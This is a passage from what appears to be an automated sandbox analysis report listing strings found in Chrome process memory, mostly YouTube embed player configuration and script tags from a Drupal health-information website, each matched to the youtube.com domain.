VOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}h5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323720471.000028EC04B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: rentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321018206.000028EC04C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: riginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: rimary] PipeControlMessageHandlerhttps://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2361080797.000028EC07D44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2483711870.000028EC03624000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355248038.000028EC062D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}w.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2344383176.000028EC06ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FFU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: scriptQIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js@@ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: scriptSKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: scriptSKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.jsb equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: t src=\"https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.js\" integrity=\"sha256-29KjXnLtx9a95INIGpEvHDiqV/qydH2bBx0xcznuA6I=\" crossorigin=\"anonymous\"></script>\n<script src=\"/themes/custom/foh/js/custom.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/script.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/thrivequestion.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/banner-slider.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/drupal.bootstrap.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/attributes.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/theme.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.behaviors.js?v=10.1.0\"></script>\n<script src=\"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/f
                                  Source: chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: t src=\"https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.js\" integrity=\"sha256-29KjXnLtx9a95INIGpEvHDiqV/qydH2bBx0xcznuA6I=\" crossorigin=\"anonymous\"></script>\n<script src=\"/themes/custom/foh/js/custom.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/script.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/thrivequestion.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/banner-slider.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/drupal.bootstrap.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/attributes.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/theme.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.behaviors.js?v=10.1.0\"></script>\n<script src=\"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/f
                                  Source: chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: t src=\"https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.js\" integrity=\"sha256-29KjXnLtx9a95INIGpEvHDiqV/qydH2bBx0xcznuA6I=\" crossorigin=\"anonymous\"></script>\n<script src=\"/themes/custom/foh/js/custom.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/script.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/thrivequestion.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/banner-slider.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/drupal.bootstrap.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/attributes.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/theme.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.behaviors.js?v=10.1.0\"></script>\n<script src=\"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/f
                                  Source: chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495185106.000028EC047AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340699100.000028EC065E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
